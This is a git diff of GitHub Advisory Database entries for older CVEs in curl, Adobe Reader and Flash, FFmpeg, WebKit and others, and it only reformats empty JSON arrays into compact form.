--- a/advisories/unreviewed/2022/05/GHSA-w358-hq9x-mwxh/GHSA-w358-hq9x-mwxh.json +++ b/advisories/unreviewed/2022/05/GHSA-w358-hq9x-mwxh/GHSA-w358-hq9x-mwxh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w35m-mj4p-jp8q/GHSA-w35m-mj4p-jp8q.json b/advisories/unreviewed/2022/05/GHSA-w35m-mj4p-jp8q/GHSA-w35m-mj4p-jp8q.json index a4e1f53074b..f3e0b70355a 100644 --- a/advisories/unreviewed/2022/05/GHSA-w35m-mj4p-jp8q/GHSA-w35m-mj4p-jp8q.json +++ b/advisories/unreviewed/2022/05/GHSA-w35m-mj4p-jp8q/GHSA-w35m-mj4p-jp8q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w3rm-phr3-x8q8/GHSA-w3rm-phr3-x8q8.json b/advisories/unreviewed/2022/05/GHSA-w3rm-phr3-x8q8/GHSA-w3rm-phr3-x8q8.json index 3d0a6a19723..e435331cee2 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3rm-phr3-x8q8/GHSA-w3rm-phr3-x8q8.json +++ b/advisories/unreviewed/2022/05/GHSA-w3rm-phr3-x8q8/GHSA-w3rm-phr3-x8q8.json @@ -7,12 +7,8 @@ "CVE-2015-3144" ], "details": "The fix_hostname function in cURL and libcurl 7.37.0 through 7.41.0 does not properly calculate an index, which allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) or possibly have other unspecified impact via a zero-length host name, as demonstrated by \"http://:80\" and \":80.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w5cf-825f-4cf6/GHSA-w5cf-825f-4cf6.json b/advisories/unreviewed/2022/05/GHSA-w5cf-825f-4cf6/GHSA-w5cf-825f-4cf6.json index 516e9662e80..23bc1ae4d87 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5cf-825f-4cf6/GHSA-w5cf-825f-4cf6.json +++ b/advisories/unreviewed/2022/05/GHSA-w5cf-825f-4cf6/GHSA-w5cf-825f-4cf6.json @@ -7,12 +7,8 @@ "CVE-2010-2209" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w633-7vm3-q65x/GHSA-w633-7vm3-q65x.json b/advisories/unreviewed/2022/05/GHSA-w633-7vm3-q65x/GHSA-w633-7vm3-q65x.json index d2a3598588f..5453e7d0795 100644 --- a/advisories/unreviewed/2022/05/GHSA-w633-7vm3-q65x/GHSA-w633-7vm3-q65x.json +++ b/advisories/unreviewed/2022/05/GHSA-w633-7vm3-q65x/GHSA-w633-7vm3-q65x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w78r-wpwh-49jc/GHSA-w78r-wpwh-49jc.json b/advisories/unreviewed/2022/05/GHSA-w78r-wpwh-49jc/GHSA-w78r-wpwh-49jc.json index 0a46d0a2d53..0abdcd9461a 100644 --- a/advisories/unreviewed/2022/05/GHSA-w78r-wpwh-49jc/GHSA-w78r-wpwh-49jc.json +++ b/advisories/unreviewed/2022/05/GHSA-w78r-wpwh-49jc/GHSA-w78r-wpwh-49jc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w7pf-xccp-f7w2/GHSA-w7pf-xccp-f7w2.json b/advisories/unreviewed/2022/05/GHSA-w7pf-xccp-f7w2/GHSA-w7pf-xccp-f7w2.json index 0a045b274a2..ec1c361b185 100644 --- a/advisories/unreviewed/2022/05/GHSA-w7pf-xccp-f7w2/GHSA-w7pf-xccp-f7w2.json +++ b/advisories/unreviewed/2022/05/GHSA-w7pf-xccp-f7w2/GHSA-w7pf-xccp-f7w2.json @@ -7,12 +7,8 @@ "CVE-2010-3624" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Mac OS X allows attackers to execute arbitrary code via a crafted image.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w7v6-vm58-fw22/GHSA-w7v6-vm58-fw22.json b/advisories/unreviewed/2022/05/GHSA-w7v6-vm58-fw22/GHSA-w7v6-vm58-fw22.json index af216e64a68..abbbc8c4358 100644 --- a/advisories/unreviewed/2022/05/GHSA-w7v6-vm58-fw22/GHSA-w7v6-vm58-fw22.json +++ b/advisories/unreviewed/2022/05/GHSA-w7v6-vm58-fw22/GHSA-w7v6-vm58-fw22.json @@ -7,12 +7,8 @@ "CVE-2011-1926" ], "details": "The STARTTLS implementation in Cyrus IMAP Server before 2.4.7 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted sessions by sending a cleartext command that is processed after TLS is in place, related to a \"plaintext command injection\" attack, a similar issue to CVE-2011-0411.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -100,9 +96,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-w894-7wf4-7w3j/GHSA-w894-7wf4-7w3j.json b/advisories/unreviewed/2022/05/GHSA-w894-7wf4-7w3j/GHSA-w894-7wf4-7w3j.json index fcf1799eb90..dabcfc4c24f 100644 --- a/advisories/unreviewed/2022/05/GHSA-w894-7wf4-7w3j/GHSA-w894-7wf4-7w3j.json +++ b/advisories/unreviewed/2022/05/GHSA-w894-7wf4-7w3j/GHSA-w894-7wf4-7w3j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w8qw-x88f-f35r/GHSA-w8qw-x88f-f35r.json b/advisories/unreviewed/2022/05/GHSA-w8qw-x88f-f35r/GHSA-w8qw-x88f-f35r.json index 37235bc7a7f..f872cf399dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-w8qw-x88f-f35r/GHSA-w8qw-x88f-f35r.json +++ b/advisories/unreviewed/2022/05/GHSA-w8qw-x88f-f35r/GHSA-w8qw-x88f-f35r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w92w-8w8q-f5jg/GHSA-w92w-8w8q-f5jg.json b/advisories/unreviewed/2022/05/GHSA-w92w-8w8q-f5jg/GHSA-w92w-8w8q-f5jg.json index cbd54c18c83..78c0bdbbb1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-w92w-8w8q-f5jg/GHSA-w92w-8w8q-f5jg.json +++ b/advisories/unreviewed/2022/05/GHSA-w92w-8w8q-f5jg/GHSA-w92w-8w8q-f5jg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-w9v3-p2fh-f4f2/GHSA-w9v3-p2fh-f4f2.json b/advisories/unreviewed/2022/05/GHSA-w9v3-p2fh-f4f2/GHSA-w9v3-p2fh-f4f2.json index 53bfaf85a99..111f903bd95 100644 --- a/advisories/unreviewed/2022/05/GHSA-w9v3-p2fh-f4f2/GHSA-w9v3-p2fh-f4f2.json +++ b/advisories/unreviewed/2022/05/GHSA-w9v3-p2fh-f4f2/GHSA-w9v3-p2fh-f4f2.json @@ -7,12 +7,8 @@ "CVE-2013-1007" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wgc4-3g78-3h3j/GHSA-wgc4-3g78-3h3j.json b/advisories/unreviewed/2022/05/GHSA-wgc4-3g78-3h3j/GHSA-wgc4-3g78-3h3j.json index ede4c496913..31a2b794b6b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wgc4-3g78-3h3j/GHSA-wgc4-3g78-3h3j.json +++ b/advisories/unreviewed/2022/05/GHSA-wgc4-3g78-3h3j/GHSA-wgc4-3g78-3h3j.json @@ -7,12 +7,8 @@ "CVE-2012-2788" ], "details": "Unspecified vulnerability in the avi_read_packet function in libavformat/avidec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an \"out of array read\" when a \"packet is shrunk.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wgxm-g76m-vmcr/GHSA-wgxm-g76m-vmcr.json b/advisories/unreviewed/2022/05/GHSA-wgxm-g76m-vmcr/GHSA-wgxm-g76m-vmcr.json index bbf8bcc239b..f73525e0fe7 100644 --- a/advisories/unreviewed/2022/05/GHSA-wgxm-g76m-vmcr/GHSA-wgxm-g76m-vmcr.json +++ b/advisories/unreviewed/2022/05/GHSA-wgxm-g76m-vmcr/GHSA-wgxm-g76m-vmcr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-whpq-x3wf-fq4q/GHSA-whpq-x3wf-fq4q.json b/advisories/unreviewed/2022/05/GHSA-whpq-x3wf-fq4q/GHSA-whpq-x3wf-fq4q.json index 98f5e9b63ae..a8efa19b878 100644 --- a/advisories/unreviewed/2022/05/GHSA-whpq-x3wf-fq4q/GHSA-whpq-x3wf-fq4q.json +++ b/advisories/unreviewed/2022/05/GHSA-whpq-x3wf-fq4q/GHSA-whpq-x3wf-fq4q.json @@ -7,12 +7,8 @@ "CVE-2010-2170" ], "details": "Integer overflow in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2181 and CVE-2010-2183.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -132,9 +128,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-whx5-qm5j-j9pp/GHSA-whx5-qm5j-j9pp.json b/advisories/unreviewed/2022/05/GHSA-whx5-qm5j-j9pp/GHSA-whx5-qm5j-j9pp.json index 7ef7d44db82..a6da0aee095 100644 --- a/advisories/unreviewed/2022/05/GHSA-whx5-qm5j-j9pp/GHSA-whx5-qm5j-j9pp.json +++ b/advisories/unreviewed/2022/05/GHSA-whx5-qm5j-j9pp/GHSA-whx5-qm5j-j9pp.json @@ -7,12 +7,8 @@ "CVE-2012-0850" ], "details": "The sbr_qmf_synthesis function in libavcodec/aacsbr.c in FFmpeg before 0.9.1 allows remote attackers to cause a denial of service (application crash) via a crafted mpg file that triggers memory corruption involving the v_off variable, probably a buffer underflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-whxp-44j4-m79c/GHSA-whxp-44j4-m79c.json b/advisories/unreviewed/2022/05/GHSA-whxp-44j4-m79c/GHSA-whxp-44j4-m79c.json index ff4e5e6416f..f554e20fd31 100644 --- a/advisories/unreviewed/2022/05/GHSA-whxp-44j4-m79c/GHSA-whxp-44j4-m79c.json +++ b/advisories/unreviewed/2022/05/GHSA-whxp-44j4-m79c/GHSA-whxp-44j4-m79c.json @@ -7,12 +7,8 @@ "CVE-2010-2204" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wm7h-9238-9p4m/GHSA-wm7h-9238-9p4m.json b/advisories/unreviewed/2022/05/GHSA-wm7h-9238-9p4m/GHSA-wm7h-9238-9p4m.json index 8cd30689eb9..bd29096b089 100644 --- a/advisories/unreviewed/2022/05/GHSA-wm7h-9238-9p4m/GHSA-wm7h-9238-9p4m.json +++ b/advisories/unreviewed/2022/05/GHSA-wm7h-9238-9p4m/GHSA-wm7h-9238-9p4m.json @@ -7,12 +7,8 @@ "CVE-2010-2171" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via vectors related to SWF files, decompression of embedded JPEG image data, and the DefineBits and other unspecified tags, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wmpf-4xq6-7xm2/GHSA-wmpf-4xq6-7xm2.json b/advisories/unreviewed/2022/05/GHSA-wmpf-4xq6-7xm2/GHSA-wmpf-4xq6-7xm2.json index ebccd054c6c..8713b52f116 100644 --- a/advisories/unreviewed/2022/05/GHSA-wmpf-4xq6-7xm2/GHSA-wmpf-4xq6-7xm2.json +++ b/advisories/unreviewed/2022/05/GHSA-wmpf-4xq6-7xm2/GHSA-wmpf-4xq6-7xm2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wqf6-gm3j-5p78/GHSA-wqf6-gm3j-5p78.json b/advisories/unreviewed/2022/05/GHSA-wqf6-gm3j-5p78/GHSA-wqf6-gm3j-5p78.json index 471629ec738..b92351fe7e4 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqf6-gm3j-5p78/GHSA-wqf6-gm3j-5p78.json +++ b/advisories/unreviewed/2022/05/GHSA-wqf6-gm3j-5p78/GHSA-wqf6-gm3j-5p78.json @@ -7,12 +7,8 @@ "CVE-2010-2666" ], "details": "Opera before 10.54 on Windows and Mac OS X does not properly enforce permission requirements for widget filesystem access and directory selection, which allows user-assisted remote attackers to create or modify arbitrary files, and consequently execute arbitrary code, via widget File I/O operations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wqh5-fgx4-grww/GHSA-wqh5-fgx4-grww.json b/advisories/unreviewed/2022/05/GHSA-wqh5-fgx4-grww/GHSA-wqh5-fgx4-grww.json index 91cfb062deb..cef18c51230 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqh5-fgx4-grww/GHSA-wqh5-fgx4-grww.json +++ b/advisories/unreviewed/2022/05/GHSA-wqh5-fgx4-grww/GHSA-wqh5-fgx4-grww.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wr89-h86r-g6mc/GHSA-wr89-h86r-g6mc.json b/advisories/unreviewed/2022/05/GHSA-wr89-h86r-g6mc/GHSA-wr89-h86r-g6mc.json index f6416ee0e50..9684f11951b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wr89-h86r-g6mc/GHSA-wr89-h86r-g6mc.json +++ b/advisories/unreviewed/2022/05/GHSA-wr89-h86r-g6mc/GHSA-wr89-h86r-g6mc.json @@ -7,12 +7,8 @@ "CVE-2008-4816" ], "details": "Unspecified vulnerability in the Download Manager in Adobe Reader 8.1.2 and earlier on Windows allows remote attackers to change Internet Security options on a client machine via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wrxq-xp77-xv2c/GHSA-wrxq-xp77-xv2c.json b/advisories/unreviewed/2022/05/GHSA-wrxq-xp77-xv2c/GHSA-wrxq-xp77-xv2c.json index 3aef569dfc7..b43340b9f50 100644 --- a/advisories/unreviewed/2022/05/GHSA-wrxq-xp77-xv2c/GHSA-wrxq-xp77-xv2c.json +++ b/advisories/unreviewed/2022/05/GHSA-wrxq-xp77-xv2c/GHSA-wrxq-xp77-xv2c.json @@ -7,12 +7,8 @@ "CVE-2011-2135" ], "details": "Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2140, CVE-2011-2417, and CVE-2011-2425.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ww3f-5c96-827w/GHSA-ww3f-5c96-827w.json b/advisories/unreviewed/2022/05/GHSA-ww3f-5c96-827w/GHSA-ww3f-5c96-827w.json index 13187c392e0..4c3bdd87d9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-ww3f-5c96-827w/GHSA-ww3f-5c96-827w.json +++ b/advisories/unreviewed/2022/05/GHSA-ww3f-5c96-827w/GHSA-ww3f-5c96-827w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wx73-qhfh-rg2r/GHSA-wx73-qhfh-rg2r.json b/advisories/unreviewed/2022/05/GHSA-wx73-qhfh-rg2r/GHSA-wx73-qhfh-rg2r.json index 5833236a895..b7727c767a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx73-qhfh-rg2r/GHSA-wx73-qhfh-rg2r.json +++ b/advisories/unreviewed/2022/05/GHSA-wx73-qhfh-rg2r/GHSA-wx73-qhfh-rg2r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wx85-qrh4-c5rw/GHSA-wx85-qrh4-c5rw.json b/advisories/unreviewed/2022/05/GHSA-wx85-qrh4-c5rw/GHSA-wx85-qrh4-c5rw.json index 60aa3e6ea8f..0af17c645ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx85-qrh4-c5rw/GHSA-wx85-qrh4-c5rw.json +++ b/advisories/unreviewed/2022/05/GHSA-wx85-qrh4-c5rw/GHSA-wx85-qrh4-c5rw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wxjw-vgmv-8955/GHSA-wxjw-vgmv-8955.json b/advisories/unreviewed/2022/05/GHSA-wxjw-vgmv-8955/GHSA-wxjw-vgmv-8955.json index 0f30c6ff36c..4c6393716dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-wxjw-vgmv-8955/GHSA-wxjw-vgmv-8955.json +++ b/advisories/unreviewed/2022/05/GHSA-wxjw-vgmv-8955/GHSA-wxjw-vgmv-8955.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x247-6f29-259j/GHSA-x247-6f29-259j.json b/advisories/unreviewed/2022/05/GHSA-x247-6f29-259j/GHSA-x247-6f29-259j.json index 495dca2e51d..f3b7cd39eb2 100644 --- a/advisories/unreviewed/2022/05/GHSA-x247-6f29-259j/GHSA-x247-6f29-259j.json +++ b/advisories/unreviewed/2022/05/GHSA-x247-6f29-259j/GHSA-x247-6f29-259j.json @@ -7,12 +7,8 @@ "CVE-2015-3236" ], "details": "cURL and libcurl 7.40.0 through 7.42.1 send the HTTP Basic authentication credentials for a previous connection when reusing a reset (curl_easy_reset) connection handle to send a request to the same host name, which allows remote attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x2w7-p2h8-pcq6/GHSA-x2w7-p2h8-pcq6.json b/advisories/unreviewed/2022/05/GHSA-x2w7-p2h8-pcq6/GHSA-x2w7-p2h8-pcq6.json index 372b2670745..e8aa2b033b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-x2w7-p2h8-pcq6/GHSA-x2w7-p2h8-pcq6.json +++ b/advisories/unreviewed/2022/05/GHSA-x2w7-p2h8-pcq6/GHSA-x2w7-p2h8-pcq6.json @@ -7,12 +7,8 @@ "CVE-2011-0565" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x38m-968w-w2xq/GHSA-x38m-968w-w2xq.json b/advisories/unreviewed/2022/05/GHSA-x38m-968w-w2xq/GHSA-x38m-968w-w2xq.json index 02cde6cedb9..e8481535879 100644 --- a/advisories/unreviewed/2022/05/GHSA-x38m-968w-w2xq/GHSA-x38m-968w-w2xq.json +++ b/advisories/unreviewed/2022/05/GHSA-x38m-968w-w2xq/GHSA-x38m-968w-w2xq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x3gx-f2mc-x7gr/GHSA-x3gx-f2mc-x7gr.json b/advisories/unreviewed/2022/05/GHSA-x3gx-f2mc-x7gr/GHSA-x3gx-f2mc-x7gr.json index 31979383806..9d837635c1b 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3gx-f2mc-x7gr/GHSA-x3gx-f2mc-x7gr.json +++ b/advisories/unreviewed/2022/05/GHSA-x3gx-f2mc-x7gr/GHSA-x3gx-f2mc-x7gr.json @@ -7,12 +7,8 @@ "CVE-2013-2496" ], "details": "The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FFmpeg through 1.1.3 does not properly determine certain end pointers, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted Microsoft RLE data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x44r-rq36-j7vf/GHSA-x44r-rq36-j7vf.json b/advisories/unreviewed/2022/05/GHSA-x44r-rq36-j7vf/GHSA-x44r-rq36-j7vf.json index 9f20c5c690d..8e19cc6178f 100644 --- a/advisories/unreviewed/2022/05/GHSA-x44r-rq36-j7vf/GHSA-x44r-rq36-j7vf.json +++ b/advisories/unreviewed/2022/05/GHSA-x44r-rq36-j7vf/GHSA-x44r-rq36-j7vf.json @@ -7,12 +7,8 @@ "CVE-2011-4695" ], "details": "Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x4cf-86pp-49rw/GHSA-x4cf-86pp-49rw.json b/advisories/unreviewed/2022/05/GHSA-x4cf-86pp-49rw/GHSA-x4cf-86pp-49rw.json index fa51af9b38c..7e075ae5684 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4cf-86pp-49rw/GHSA-x4cf-86pp-49rw.json +++ b/advisories/unreviewed/2022/05/GHSA-x4cf-86pp-49rw/GHSA-x4cf-86pp-49rw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x4f3-5w3r-7q6g/GHSA-x4f3-5w3r-7q6g.json b/advisories/unreviewed/2022/05/GHSA-x4f3-5w3r-7q6g/GHSA-x4f3-5w3r-7q6g.json index 46f81446aee..99e65793bed 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4f3-5w3r-7q6g/GHSA-x4f3-5w3r-7q6g.json +++ b/advisories/unreviewed/2022/05/GHSA-x4f3-5w3r-7q6g/GHSA-x4f3-5w3r-7q6g.json @@ -7,12 +7,8 @@ "CVE-2013-1006" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x55w-7qj6-9jgx/GHSA-x55w-7qj6-9jgx.json b/advisories/unreviewed/2022/05/GHSA-x55w-7qj6-9jgx/GHSA-x55w-7qj6-9jgx.json index c02571ec211..9a3760a9be3 100644 --- a/advisories/unreviewed/2022/05/GHSA-x55w-7qj6-9jgx/GHSA-x55w-7qj6-9jgx.json +++ b/advisories/unreviewed/2022/05/GHSA-x55w-7qj6-9jgx/GHSA-x55w-7qj6-9jgx.json @@ -13,9 